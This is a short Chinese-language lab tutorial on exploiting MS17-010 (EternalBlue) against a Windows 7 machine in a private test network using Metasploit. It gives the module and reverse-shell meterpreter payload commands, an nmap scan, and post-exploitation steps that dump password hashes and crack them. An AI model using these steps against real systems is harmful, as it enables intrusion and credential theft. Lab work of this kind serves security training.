metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
0x01 知识点
MSF工具的利用,ms17-010漏洞实验
0x02 实验环境:
攻击机kaili linux 2020 (ip:192.168.233.129)
目标机:win7(ip:192.168.233.130)
0x03 实验准备
- 启动msf,输入msfconsole
- 检错漏洞库,输入search ms ,检查msf库里是否存在ms17-010漏洞
3、nmap检测目标机开放端口
nmap –sV 192.168.233.130
证明目标机445端口开放,存在攻击条件
0x04实验过程
- 1、配置exploit
use exploit/windows/smb/ms17_010_eternalblue
提示:使用模块后,它会告诉我们默认有效载荷是什么,此处pay载荷 windows/x64/meterpreter/reverse_tcp 下文攻击会用到
设置目标IP,通过查看设置选项,show options,此处RHOSTS为攻击目标需要设置
set rhost 192.168.233.130
注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;
- 2、配置payload
payload只需要配置监听返回会话的IP
警告:攻击过程可能导致目标系统宕机重启,谨慎操作!
- 3、攻击
msf exploit(ms17_010_eternalblue) > exploit
session对话创建成功,msf5就会变成meterpreter,攻击成功
meterpreter > sysinfo
可以查看目标机信息
可以输入其他命令
0x05 后渗透阶段
详见下一篇文章
- 1、利用脚本获取服务器用户及哈希
meterpreter > run post/windows/gather/smart_hashdump
利用彩虹表解开administrator的密码
- 2、截屏